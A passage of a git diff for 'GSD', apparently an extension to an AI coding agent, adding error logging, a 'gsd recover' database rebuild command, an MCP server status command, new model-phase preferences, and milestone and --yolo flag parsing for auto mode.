await import("./state.js"); + const { isDbAvailable, getMilestone } = await import("./gsd-db.js"); const attachedBranches = new Set( listWorktrees(basePath).map((wt) => wt.branch), @@ -54,12 +59,29 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa for (const branch of milestoneBranches) { if (attachedBranches.has(branch)) continue; const milestoneId = branch.replace(/^milestone\//, ""); + + // DB-first: check milestone status directly + if (isDbAvailable()) { + const dbRow = getMilestone(milestoneId); + if (dbRow) { + if (dbRow.status !== "complete" && dbRow.status !== "done") continue; + // Milestone is complete per DB — proceed to delete branch + try { + nativeBranchDelete(basePath, branch, true); + deletedStaleMilestones++; + } catch (e) { logWarning("command", `stale milestone branch delete failed for ${branch}: ${(e as Error).message}`); } + continue; + } + } + + // Filesystem fallback const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP"); if (!roadmapPath) continue; let roadmapContent: string | null = null; try { roadmapContent = await loadFile(roadmapPath); - } catch { + } catch (e) { + logWarning("command", `loadFile failed for ${roadmapPath}: ${(e as Error).message}`); roadmapContent = null; } if (!roadmapContent) continue; @@ -67,12 +89,12 @@ export async function handleCleanupBranches(ctx: ExtensionCommandContext, basePa try { nativeBranchDelete(basePath, branch, true); deletedStaleMilestones++; - } catch { - /* non-fatal */ + } catch (e) { + logWarning("command", `milestone branch delete failed for ${branch}: ${(e as Error).message}`); } } - } catch { - /* non-fatal */ + } catch (e) { + logWarning("command", `stale milestone cleanup failed: ${(e as Error).message}`); } const summary: string[] = []; @@ -104,7 +126,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP let refs: string[]; try { refs = nativeForEachRef(basePath, "refs/gsd/snapshots/"); - } catch { + } 
catch (e) { + logWarning("command", `snapshot ref list failed: ${(e as Error).message}`); ctx.ui.notify("No snapshot refs to clean up.", "info"); return; } @@ -129,8 +152,8 @@ export async function handleCleanupSnapshots(ctx: ExtensionCommandContext, baseP try { nativeUpdateRef(basePath, old); pruned++; - } catch { - /* skip individual failures */ + } catch (e) { + logWarning("command", `snapshot ref update failed for ${old}: ${(e as Error).message}`); } } } @@ -146,7 +169,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP let statuses; try { statuses = getAllWorktreeHealth(basePath); - } catch { + } catch (e) { + logWarning("command", `worktree health inspection failed: ${(e as Error).message}`); ctx.ui.notify("Failed to inspect worktrees.", "error"); return; } @@ -179,7 +203,8 @@ export async function handleCleanupWorktrees(ctx: ExtensionCommandContext, baseP removeWorktree(basePath, wt.name, { deleteBranch: true }); lines.push(` ✓ ${wt.name} removed (branch ${wt.branch} deleted)`); removed++; - } catch { + } catch (e) { + logWarning("command", `worktree removal failed for ${wt.name}: ${(e as Error).message}`); lines.push(` ✗ ${wt.name} failed to remove`); } } @@ -228,7 +253,7 @@ export async function handleSkip(unitArg: string, ctx: ExtensionCommandContext, if (fileExists(completedKeysFile)) { keys = JSON.parse(readFile(completedKeysFile, "utf-8")); } - } catch { /* start fresh */ } + } catch (e) { logWarning("command", `completed-units.json parse failed: ${(e as Error).message}`); } // Normalize: accept "execute-task/M001/S01/T03", "M001/S01/T03", or just "T03" let skipKey = unitArg; @@ -353,7 +378,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC hashList = readdirSync(projectsDir, { withFileTypes: true }) .filter(e => e.isDirectory()) .map(e => e.name); - } catch { + } catch (e) { + logWarning("command", `readdir failed for project-state directory: ${(e as Error).message}`); 
ctx.ui.notify(`Failed to read project-state directory at ${projectsDir}.`, "error"); return; } @@ -436,7 +462,8 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC try { fsRmSync(pathJoin(projectsDir, e.hash), { recursive: true, force: true }); removed++; - } catch { + } catch (err) { + logWarning("command", `project cleanup rm failed for ${e.hash}: ${(err as Error).message}`); failed.push(e.hash); } } @@ -450,3 +477,68 @@ export async function handleCleanupProjects(args: string, ctx: ExtensionCommandC ctx.ui.notify(lines.join("\n"), "info"); } + +/** + * `gsd recover` — Reconstruct DB hierarchy state from rendered markdown on disk. + * + * Deletes milestones, slices, and tasks table rows (preserves decisions, + * requirements, artifacts, memories), re-runs `migrateHierarchyToDb()` to + * repopulate from markdown, then calls `deriveState()` to verify sanity. + * + * Prints counts of recovered items and the resulting project phase. + */ +export async function handleRecover(ctx: ExtensionCommandContext, basePath: string): Promise { + const { isDbAvailable: dbAvailable, _getAdapter, transaction: dbTransaction } = await import("./gsd-db.js"); + const { migrateHierarchyToDb } = await import("./md-importer.js"); + const { invalidateStateCache } = await import("./state.js"); + + if (!dbAvailable()) { + ctx.ui.notify("gsd recover: No database open. Run a GSD command first to initialize the DB.", "error"); + return; + } + + try { + // 1. Delete + re-populate inside a single transaction for atomicity + const db = _getAdapter()!; + const counts = dbTransaction(() => { + db.exec("DELETE FROM tasks"); + db.exec("DELETE FROM slices"); + db.exec("DELETE FROM milestones"); + return migrateHierarchyToDb(basePath); + }); + + // 3. Invalidate state cache so deriveState() picks up fresh DB data + invalidateStateCache(); + + // 4. Derive state to verify sanity + const state = await deriveState(basePath); + + // 5. 
Report + const lines = [ + `gsd recover: reconstructed hierarchy from markdown`, + ` Milestones: ${counts.milestones}`, + ` Slices: ${counts.slices}`, + ` Tasks: ${counts.tasks}`, + ``, + ` Phase: ${state.phase}`, + ]; + if (state.activeMilestone) { + lines.push(` Active: ${state.activeMilestone.id}: ${state.activeMilestone.title}`); + } + if (state.activeSlice) { + lines.push(` Slice: ${state.activeSlice.id}: ${state.activeSlice.title}`); + } + if (state.activeTask) { + lines.push(` Task: ${state.activeTask.id}: ${state.activeTask.title}`); + } + + process.stderr.write( + `gsd-recover: recovered ${counts.milestones}M/${counts.slices}S/${counts.tasks}T hierarchy\n`, + ); + ctx.ui.notify(lines.join("\n"), "success"); + } catch (err) { + const msg = err instanceof Error ? err.message : String(err); + logWarning("command", `recover failed: ${msg}`); + ctx.ui.notify(`gsd recover failed: ${msg}`, "error"); + } +} diff --git a/src/resources/extensions/gsd/commands-mcp-status.ts b/src/resources/extensions/gsd/commands-mcp-status.ts new file mode 100644 index 000000000..560e58d03 --- /dev/null +++ b/src/resources/extensions/gsd/commands-mcp-status.ts @@ -0,0 +1,247 @@ +/** + * MCP Status — `/gsd mcp` command handler. + * + * Shows configured MCP servers, their connection status, and available tools. 
+ * + * Subcommands: + * /gsd mcp — Overview of all servers (alias: /gsd mcp status) + * /gsd mcp status — Same as bare /gsd mcp + * /gsd mcp check — Detailed status for a specific server + */ + +import type { ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { existsSync, readFileSync } from "node:fs"; +import { join } from "node:path"; + +// ─── Types ────────────────────────────────────────────────────────────────── + +export interface McpServerStatus { + name: string; + transport: "stdio" | "http" | "unknown"; + connected: boolean; + toolCount: number; + error: string | undefined; +} + +export interface McpServerDetail extends McpServerStatus { + tools: string[]; +} + +// ─── Config reader (standalone — does not import mcp-client internals) ────── + +interface McpServerRawConfig { + name: string; + transport: "stdio" | "http" | "unknown"; + command?: string; + args?: string[]; + url?: string; +} + +function readMcpConfigs(): McpServerRawConfig[] { + const servers: McpServerRawConfig[] = []; + const seen = new Set(); + const configPaths = [ + join(process.cwd(), ".mcp.json"), + join(process.cwd(), ".gsd", "mcp.json"), + ]; + + for (const configPath of configPaths) { + try { + if (!existsSync(configPath)) continue; + const raw = readFileSync(configPath, "utf-8"); + const data = JSON.parse(raw) as Record; + const mcpServers = (data.mcpServers ?? data.servers) as + | Record> + | undefined; + if (!mcpServers || typeof mcpServers !== "object") continue; + + for (const [name, config] of Object.entries(mcpServers)) { + if (seen.has(name)) continue; + seen.add(name); + + const hasCommand = typeof config.command === "string"; + const hasUrl = typeof config.url === "string"; + const transport: McpServerRawConfig["transport"] = hasCommand + ? "stdio" + : hasUrl + ? "http" + : "unknown"; + + servers.push({ + name, + transport, + ...(hasCommand && { + command: config.command as string, + args: Array.isArray(config.args) ? 
(config.args as string[]) : undefined, + }), + ...(hasUrl && { url: config.url as string }), + }); + } + } catch { + // Non-fatal — config file may not exist or be malformed + } + } + + return servers; +} + +// ─── Formatters (exported for testing) ────────────────────────────────────── + +export function formatMcpStatusReport(servers: McpServerStatus[]): string { + if (servers.length === 0) { + return [ + "No MCP servers configured.", + "", + "Add servers to .mcp.json or .gsd/mcp.json to enable MCP integrations.", + "See: https://modelcontextprotocol.io/quickstart", + ].join("\n"); + } + + const lines: string[] = [`MCP Server Status — ${servers.length} server(s)\n`]; + + for (const s of servers) { + const icon = s.error ? "✗" : s.connected ? "✓" : "○"; + const status = s.error + ? `error: ${s.error}` + : s.connected + ? `connected — ${s.toolCount} tools` + : "disconnected"; + lines.push(` ${icon} ${s.name} (${s.transport}) — ${status}`); + } + + lines.push(""); + lines.push("Use /gsd mcp check for details on a specific server."); + lines.push("Use mcp_discover to connect and list tools for a server."); + + return lines.join("\n"); +} + +export function formatMcpServerDetail(server: McpServerDetail): string { + const lines: string[] = [`MCP Server: ${server.name}\n`]; + + lines.push(` Transport: ${server.transport}`); + + if (server.error) { + lines.push(` Status: error`); + lines.push(` Error: ${server.error}`); + } else if (server.connected) { + lines.push(` Status: connected`); + lines.push(` Tools: ${server.toolCount}`); + if (server.tools.length > 0) { + lines.push(""); + lines.push(" Available tools:"); + for (const tool of server.tools) { + lines.push(` - ${tool}`); + } + } + } else { + lines.push(` Status: disconnected`); + lines.push(""); + lines.push(` Run mcp_discover("${server.name}") to connect and list tools.`); + } + + return lines.join("\n"); +} + +// ─── Command handler ──────────────────────────────────────────────────────── + +/** + * Handle 
`/gsd mcp [status|check ]`. + */ +export async function handleMcpStatus( + args: string, + ctx: ExtensionCommandContext, +): Promise { + const trimmed = args.trim().toLowerCase(); + const configs = readMcpConfigs(); + + // /gsd mcp check + if (trimmed.startsWith("check ")) { + const serverName = args.trim().slice("check ".length).trim(); + const config = configs.find((c) => c.name === serverName); + if (!config) { + const available = configs.map((c) => c.name).join(", ") || "(none)"; + ctx.ui.notify( + `Unknown MCP server: "${serverName}"\n\nAvailable: ${available}`, + "warning", + ); + return; + } + + // Try to get connection/tool info from the mcp-client module if available + let connected = false; + let toolNames: string[] = []; + let error: string | undefined; + try { + const mcpClient = await import("../mcp-client/index.js"); + // Access the module's connection state if exported; fall back gracefully + const mod = mcpClient as Record; + if (typeof mod.getConnectionStatus === "function") { + const status = (mod.getConnectionStatus as (name: string) => { connected: boolean; tools: string[]; error?: string })(serverName); + connected = status.connected; + toolNames = status.tools; + error = status.error; + } + } catch { + // mcp-client may not expose status helpers — that's fine + } + + ctx.ui.notify( + formatMcpServerDetail({ + name: config.name, + transport: config.transport, + connected, + toolCount: toolNames.length, + tools: toolNames, + error, + }), + "info", + ); + return; + } + + // /gsd mcp or /gsd mcp status + if (!trimmed || trimmed === "status") { + // Build status for each server + const statuses: McpServerStatus[] = []; + + for (const config of configs) { + let connected = false; + let toolCount = 0; + let error: string | undefined; + + try { + const mcpClient = await import("../mcp-client/index.js"); + const mod = mcpClient as Record; + if (typeof mod.getConnectionStatus === "function") { + const status = (mod.getConnectionStatus as (name: string) 
=> { connected: boolean; tools: string[]; error?: string })(config.name); + connected = status.connected; + toolCount = status.tools.length; + error = status.error; + } + } catch { + // Fall back to unknown state + } + + statuses.push({ + name: config.name, + transport: config.transport, + connected, + toolCount, + error, + }); + } + + ctx.ui.notify(formatMcpStatusReport(statuses), "info"); + return; + } + + // Unknown subcommand + ctx.ui.notify( + "Usage: /gsd mcp [status|check ]\n\n" + + " status Show all MCP server statuses (default)\n" + + " check Detailed status for a specific server", + "warning", + ); +} diff --git a/src/resources/extensions/gsd/commands-prefs-wizard.ts b/src/resources/extensions/gsd/commands-prefs-wizard.ts index 46e4b0a37..f94a78010 100644 --- a/src/resources/extensions/gsd/commands-prefs-wizard.ts +++ b/src/resources/extensions/gsd/commands-prefs-wizard.ts @@ -165,10 +165,10 @@ export function buildCategorySummaries(prefs: Record): Record | undefined; + const models = prefs.models as Record | undefined; let modelsSummary = "(not configured)"; if (models && Object.keys(models).length > 0) { - const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${model}`); + const parts = Object.entries(models).map(([phase, model]) => `${phase}: ${formatConfiguredModel(model)}`); modelsSummary = parts.join(", "); } @@ -184,11 +184,23 @@ export function buildCategorySummaries(prefs: Record): Record | undefined; + const staleThreshold = prefs.stale_commit_threshold_minutes; + const absorbSnapshots = git?.absorb_snapshot_commits; let gitSummary = "(defaults)"; - if (git && Object.keys(git).length > 0) { - const branch = git.main_branch ?? "main"; - const push = git.auto_push ? "on" : "off"; - gitSummary = `main: ${branch}, push: ${push}`; + { + const parts: string[] = []; + if (git && Object.keys(git).length > 0) { + const branch = git.main_branch ?? "main"; + const push = git.auto_push ? 
"on" : "off"; + parts.push(`main: ${branch}, push: ${push}`); + } + if (staleThreshold !== undefined) { + parts.push(`stale: ${staleThreshold === 0 ? "off" : `${staleThreshold}m`}`); + } + if (absorbSnapshots !== undefined) { + parts.push(`absorb: ${absorbSnapshots ? "on" : "off"}`); + } + if (parts.length > 0) gitSummary = parts.join(", "); } // Skills @@ -243,9 +255,38 @@ export function buildCategorySummaries(prefs: Record): Record): Promise { - const modelPhases = ["research", "planning", "execution", "completion"] as const; - const models: Record = (prefs.models as Record) ?? {}; + const modelPhases = [ + "research", + "planning", + "discuss", + "execution", + "execution_simple", + "completion", + "validation", + "subagent", + ] as const; + const models: Record = (prefs.models as Record) ?? {}; const availableModels = ctx.modelRegistry.getAvailable(); if (availableModels.length > 0) { @@ -265,15 +306,22 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record a.id.localeCompare(b.id)); } - // Build provider menu with model counts + // Display names for providers in the preferences wizard UI. + const PROVIDER_DISPLAY_NAMES: Record = { anthropic: "anthropic-api" }; + const displayName = (p: string) => PROVIDER_DISPLAY_NAMES[p] ?? p; + + // Build provider menu with model counts (display name → real name lookup) + const displayToReal = new Map(); const providerOptions = providers.map(p => { const count = byProvider.get(p)!.length; - return `${p} (${count} models)`; + const label = `${displayName(p)} (${count} models)`; + displayToReal.set(label, p); + return label; }); providerOptions.push("(keep current)", "(clear)", "(type manually)"); for (const phase of modelPhases) { - const current = models[phase] ?? ""; + const current = formatConfiguredModel(models[phase]); const phaseLabel = `Model for ${phase} phase${current ? 
` (current: ${current})` : ""}`; // Step 1: pick provider @@ -298,25 +346,25 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record m.id); modelOptions.push("(keep current)", "(clear)"); - const modelChoice = await ctx.ui.select(`${phaseLabel} — ${providerName}:`, modelOptions); + const modelChoice = await ctx.ui.select(`${phaseLabel} — ${displayName(providerName)}:`, modelOptions); if (modelChoice && typeof modelChoice === "string" && modelChoice !== "(keep current)") { if (modelChoice === "(clear)") { delete models[phase]; } else { - models[phase] = modelChoice; + models[phase] = toPersistedModelId(providerName, modelChoice); } } } } else { for (const phase of modelPhases) { - const current = models[phase] ?? ""; + const current = formatConfiguredModel(models[phase]); const input = await ctx.ui.input( `Model for ${phase} phase${current ? ` (current: ${current})` : ""}:`, current || "e.g. claude-sonnet-4-20250514", @@ -333,6 +381,8 @@ async function configureModels(ctx: ExtensionCommandContext, prefs: Record 0) { prefs.models = models; + } else { + delete prefs.models; } } @@ -390,7 +440,7 @@ async function configureGit(ctx: ExtensionCommandContext, prefs: Record 0) { prefs.git = git; } + + // stale_commit_threshold_minutes (top-level pref, shown in Git section) + const currentThreshold = prefs.stale_commit_threshold_minutes; + const thresholdStr = currentThreshold !== undefined ? String(currentThreshold) : ""; + const thresholdInput = await ctx.ui.input( + `Stale commit threshold (minutes, 0 to disable)${thresholdStr ? ` (current: ${thresholdStr})` : " (default: 30)"}:`, + thresholdStr || "30", + ); + if (thresholdInput !== null && thresholdInput !== undefined) { + const val = thresholdInput.trim(); + const parsed = tryParseInteger(val); + if (val && parsed !== null && parsed >= 0) { + prefs.stale_commit_threshold_minutes = parsed; + } else if (val && parsed === null) { + ctx.ui.notify(`Invalid value "${val}" — must be a whole number. 
Keeping previous value.`, "warning"); + } else if (!val && currentThreshold !== undefined) { + delete prefs.stale_commit_threshold_minutes; + } + } } async function configureSkills(ctx: ExtensionCommandContext, prefs: Record): Promise { @@ -588,7 +668,7 @@ export async function configureMode(ctx: ExtensionCommandContext, prefs: Record< if (modeStr.startsWith("solo")) { prefs.mode = "solo"; ctx.ui.notify( - "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=false, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false", + "Mode: solo — defaults: auto_push=true, push_branches=false, pre_merge_check=auto, merge_strategy=squash, isolation=worktree, unique_milestone_ids=false", "info", ); } else if (modeStr.startsWith("team")) { @@ -771,7 +851,7 @@ export async function ensurePreferencesFile( scope: "global" | "project", ): Promise { if (!existsSync(path)) { - const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "preferences.md")); + const template = await loadFile(join(dirname(fileURLToPath(import.meta.url)), "templates", "PREFERENCES.md")); if (!template) { ctx.ui.notify("Could not load GSD preferences template.", "error"); return; diff --git a/src/resources/extensions/gsd/commands/catalog.ts b/src/resources/extensions/gsd/commands/catalog.ts index 6f2613382..1aa1040f1 100644 --- a/src/resources/extensions/gsd/commands/catalog.ts +++ b/src/resources/extensions/gsd/commands/catalog.ts @@ -15,7 +15,7 @@ export interface GsdCommandDefinition { type CompletionMap = Record; export const GSD_COMMAND_DESCRIPTION = - "GSD — Get Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|rate|skip|export|cleanup|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast"; + "GSD — Get 
Shit Done: /gsd help|start|templates|next|auto|stop|pause|status|widget|visualize|queue|quick|discuss|capture|triage|dispatch|history|undo|undo-task|reset-slice|rate|skip|export|cleanup|model|mode|prefs|config|keys|hooks|run-hook|skill-health|doctor|logs|forensics|changelog|migrate|remote|steer|knowledge|new-milestone|parallel|cmux|park|unpark|init|setup|inspect|extensions|update|fast|mcp|rethink|codebase|notifications"; export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "help", desc: "Categorized command reference with descriptions" }, @@ -35,10 +35,13 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "dispatch", desc: "Dispatch a specific phase directly" }, { cmd: "history", desc: "View execution history" }, { cmd: "undo", desc: "Revert last completed unit" }, + { cmd: "undo-task", desc: "Reset a specific task's completion state (DB + markdown)" }, + { cmd: "reset-slice", desc: "Reset a slice and all its tasks (DB + markdown)" }, { cmd: "rate", desc: "Rate last unit's model tier (over/ok/under) — improves adaptive routing" }, { cmd: "skip", desc: "Prevent a unit from auto-mode dispatch" }, { cmd: "export", desc: "Export milestone/slice results" }, { cmd: "cleanup", desc: "Remove merged branches or snapshots" }, + { cmd: "model", desc: "Switch the active session model or open a picker" }, { cmd: "mode", desc: "Switch workflow mode (solo/team)" }, { cmd: "prefs", desc: "Manage preferences (model selection, timeouts, etc.)" }, { cmd: "config", desc: "Set API keys for external tools" }, @@ -46,6 +49,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "hooks", desc: "Show configured post-unit and pre-dispatch hooks" }, { cmd: "run-hook", desc: "Manually trigger a specific hook" }, { cmd: "skill-health", desc: "Skill lifecycle dashboard" }, + { cmd: "notifications", desc: "View, filter, and clear persistent notification history" }, { cmd: "doctor", desc: "Runtime health checks 
with auto-fix" }, { cmd: "logs", desc: "Browse activity logs, debug logs, and metrics" }, { cmd: "forensics", desc: "Examine execution logs" }, @@ -57,7 +61,7 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "inspect", desc: "Show SQLite DB diagnostics" }, { cmd: "knowledge", desc: "Add persistent project knowledge (rule, pattern, or lesson)" }, { cmd: "new-milestone", desc: "Create a milestone from a specification document (headless)" }, - { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge)" }, + { cmd: "parallel", desc: "Parallel milestone orchestration (start, status, stop, merge, watch)" }, { cmd: "cmux", desc: "Manage cmux integration (status, sidebar, notifications, splits)" }, { cmd: "park", desc: "Park a milestone — skip without deleting" }, { cmd: "unpark", desc: "Reactivate a parked milestone" }, @@ -66,7 +70,10 @@ export const TOP_LEVEL_SUBCOMMANDS: readonly GsdCommandDefinition[] = [ { cmd: "templates", desc: "List available workflow templates" }, { cmd: "extensions", desc: "Manage extensions (list, enable, disable, info)" }, { cmd: "fast", desc: "Toggle OpenAI service tier (on/off/flex/status)" }, + { cmd: "mcp", desc: "MCP server status and connectivity check (status, check )" }, + { cmd: "rethink", desc: "Conversational project reorganization — reorder, park, discard, add milestones" }, { cmd: "workflow", desc: "Custom workflow lifecycle (new, run, list, validate, pause, resume)" }, + { cmd: "codebase", desc: "Generate, refresh, and inspect the codebase map cache (.gsd/CODEBASE.md)" }, ]; const NESTED_COMPLETIONS: CompletionMap = { @@ -96,6 +103,7 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "pause", desc: "Pause a specific worker" }, { cmd: "resume", desc: "Resume a paused worker" }, { cmd: "merge", desc: "Merge completed milestone branches" }, + { cmd: "watch", desc: "Live TUI dashboard monitoring all workers" }, ], setup: [ { cmd: "llm", desc: "Configure LLM provider 
settings" }, @@ -104,6 +112,11 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "keys", desc: "Manage API keys" }, { cmd: "prefs", desc: "Configure global preferences" }, ], + notifications: [ + { cmd: "clear", desc: "Clear all notifications" }, + { cmd: "tail", desc: "Show last N notifications (default: 20)" }, + { cmd: "filter", desc: "Filter by severity (error|warning|info|success)" }, + ], logs: [ { cmd: "debug", desc: "List or view debug log files" }, { cmd: "tail", desc: "Show last N activity log summaries" }, @@ -185,6 +198,10 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "flex", desc: "Flex tier (0.5x cost, slower)" }, { cmd: "status", desc: "Show current service tier setting" }, ], + mcp: [ + { cmd: "status", desc: "Show all MCP server statuses (default)" }, + { cmd: "check", desc: "Detailed status for a specific server" }, + ], doctor: [ { cmd: "fix", desc: "Auto-fix detected issues" }, { cmd: "heal", desc: "AI-driven deep healing" }, @@ -216,6 +233,16 @@ const NESTED_COMPLETIONS: CompletionMap = { { cmd: "pause", desc: "Pause custom workflow auto-mode" }, { cmd: "resume", desc: "Resume paused custom workflow auto-mode" }, ], + codebase: [ + { cmd: "generate", desc: "Generate or regenerate CODEBASE.md" }, + { cmd: "generate --max-files", desc: "Generate with custom file limit (default: 500)" }, + { cmd: "generate --collapse-threshold", desc: "Generate with custom collapse threshold (default: 20)" }, + { cmd: "update", desc: "Refresh the CODEBASE.md cache immediately (preserves descriptions)" }, + { cmd: "update --max-files", desc: "Update with custom file limit" }, + { cmd: "update --collapse-threshold", desc: "Update with custom collapse threshold" }, + { cmd: "stats", desc: "Show file count, description coverage, and generation time" }, + { cmd: "help", desc: "Show usage and available subcommands" }, + ], }; function filterOptions( diff --git a/src/resources/extensions/gsd/commands/context.ts 
b/src/resources/extensions/gsd/commands/context.ts index 07f237592..f4a5aa423 100644 --- a/src/resources/extensions/gsd/commands/context.ts +++ b/src/resources/extensions/gsd/commands/context.ts @@ -13,7 +13,13 @@ export interface GsdDispatchContext { } export function projectRoot(): string { - const cwd = process.cwd(); + let cwd: string; + try { + cwd = process.cwd(); + } catch { + // cwd directory was deleted (e.g. worktree teardown) — fall back to HOME (#3598) + cwd = process.env.HOME ?? "/"; + } const root = resolveProjectRoot(cwd); if (root !== cwd) { assertSafeDirectory(cwd); @@ -47,15 +53,10 @@ export async function guardRemoteSession( return false; } - const unitsMsg = remote.completedUnits != null - ? `${remote.completedUnits} units completed` - : ""; - const choice = await showNextAction(ctx, { title: `Auto-mode is running in another terminal (PID ${remote.pid})`, summary: [ `Currently executing: ${unitLabel}`, - ...(unitsMsg ? [unitsMsg] : []), ...(remote.startedAt ? [`Started: ${remote.startedAt}`] : []), ], actions: [ diff --git a/src/resources/extensions/gsd/commands/dispatcher.ts b/src/resources/extensions/gsd/commands/dispatcher.ts index 9f28cbbaa..a3d11344b 100644 --- a/src/resources/extensions/gsd/commands/dispatcher.ts +++ b/src/resources/extensions/gsd/commands/dispatcher.ts @@ -14,7 +14,7 @@ export async function handleGSDCommand( const trimmed = (typeof args === "string" ? args : "").trim(); const handlers = [ - () => handleCoreCommand(trimmed, ctx), + () => handleCoreCommand(trimmed, ctx, pi), () => handleAutoCommand(trimmed, ctx, pi), () => handleParallelCommand(trimmed, ctx, pi), () => handleWorkflowCommand(trimmed, ctx, pi), @@ -29,4 +29,3 @@ export async function handleGSDCommand( ctx.ui.notify(`Unknown: /gsd ${trimmed}. 
Run /gsd help for available commands.`, "warning"); } - diff --git a/src/resources/extensions/gsd/commands/handlers/auto.ts b/src/resources/extensions/gsd/commands/handlers/auto.ts index b261d8a34..923191cfb 100644 --- a/src/resources/extensions/gsd/commands/handlers/auto.ts +++ b/src/resources/extensions/gsd/commands/handlers/auto.ts @@ -1,9 +1,66 @@ import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; +import { existsSync, readFileSync } from "node:fs"; +import { resolve } from "node:path"; + import { enableDebug } from "../../debug-logger.js"; import { getAutoDashboardData, isAutoActive, isAutoPaused, pauseAuto, startAuto, stopAuto, stopAutoRemote } from "../../auto.js"; import { handleRate } from "../../commands-rate.js"; import { guardRemoteSession, projectRoot } from "../context.js"; +import { findMilestoneIds } from "../../milestone-id-utils.js"; + +/** + * Parse --yolo flag and optional file path from the auto command string. + * Supports: `/gsd auto --yolo path/to/file.md` or `/gsd auto -y path/to/file.md` + */ +function parseYoloFlag(trimmed: string): { yoloSeedFile: string | null; rest: string } { + const yoloRe = /(?:--yolo|-y)\s+("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|\S+)/; + const match = trimmed.match(yoloRe); + if (!match) return { yoloSeedFile: null, rest: trimmed }; + + // Strip quotes if present + let filePath = match[1]; + if ((filePath.startsWith('"') && filePath.endsWith('"')) || + (filePath.startsWith("'") && filePath.endsWith("'"))) { + filePath = filePath.slice(1, -1); + } + + const rest = trimmed.replace(match[0], "").replace(/\s+/g, " ").trim(); + return { yoloSeedFile: filePath, rest }; +} + +/** + * Extract a milestone ID (e.g. M016 or M001-a3b4c5) from the command string. + * Returns the matched ID and the remaining string with the ID removed. + * The milestone ID pattern matches the format used by findMilestoneIds: M\d+ with + * an optional -[a-z0-9]{6} suffix for unique milestone IDs. 
+ */ +export function parseMilestoneTarget(input: string): { milestoneId: string | null; rest: string } { + const match = input.match(/\b(M\d+(?:-[a-z0-9]{6})?)\b/); + if (!match) return { milestoneId: null, rest: input }; + const rest = input.replace(match[0], "").replace(/\s+/g, " ").trim(); + return { milestoneId: match[1], rest }; +} + +/** + * Set GSD_MILESTONE_LOCK to target a specific milestone, then run `fn`. + * Clears the env var when `fn` resolves or rejects, so the lock does not + * leak into subsequent commands in the same process. + */ +async function withMilestoneLock(milestoneId: string, fn: () => Promise): Promise { + const previous = process.env.GSD_MILESTONE_LOCK; + process.env.GSD_MILESTONE_LOCK = milestoneId; + try { + await fn(); + } finally { + // Restore previous value (undefined → delete, else restore). + if (previous === undefined) { + delete process.env.GSD_MILESTONE_LOCK; + } else { + process.env.GSD_MILESTONE_LOCK = previous; + } + } +} export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise { if (trimmed === "next" || trimmed.startsWith("next ")) { @@ -12,20 +69,73 @@ export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandCo await handleDryRun(ctx, projectRoot()); return true; } - const verboseMode = trimmed.includes("--verbose"); - const debugMode = trimmed.includes("--debug"); + const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(trimmed); + const verboseMode = afterMilestone.includes("--verbose"); + const debugMode = afterMilestone.includes("--debug"); if (debugMode) enableDebug(projectRoot()); if (!(await guardRemoteSession(ctx, pi))) return true; - await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }); + + // Validate the milestone target exists and is not already complete. 
+ if (milestoneId) { + const allIds = findMilestoneIds(projectRoot()); + if (!allIds.includes(milestoneId)) { + ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error"); + return true; + } + } + + if (milestoneId) { + await withMilestoneLock(milestoneId, () => + startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }), + ); + } else { + await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }); + } return true; } if (trimmed === "auto" || trimmed.startsWith("auto ")) { - const verboseMode = trimmed.includes("--verbose"); - const debugMode = trimmed.includes("--debug"); + const { yoloSeedFile, rest: afterYolo } = parseYoloFlag(trimmed); + const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(afterYolo); + const verboseMode = afterMilestone.includes("--verbose"); + const debugMode = afterMilestone.includes("--debug"); if (debugMode) enableDebug(projectRoot()); if (!(await guardRemoteSession(ctx, pi))) return true; - await startAuto(ctx, pi, projectRoot(), verboseMode); + + // Validate the milestone target exists and is not already complete. + if (milestoneId) { + const allIds = findMilestoneIds(projectRoot()); + if (!allIds.includes(milestoneId)) { + ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error"); + return true; + } + } + + if (yoloSeedFile) { + const resolved = resolve(projectRoot(), yoloSeedFile); + if (!existsSync(resolved)) { + ctx.ui.notify(`Yolo seed file not found: ${resolved}`, "error"); + return true; + } + const seedContent = readFileSync(resolved, "utf-8").trim(); + if 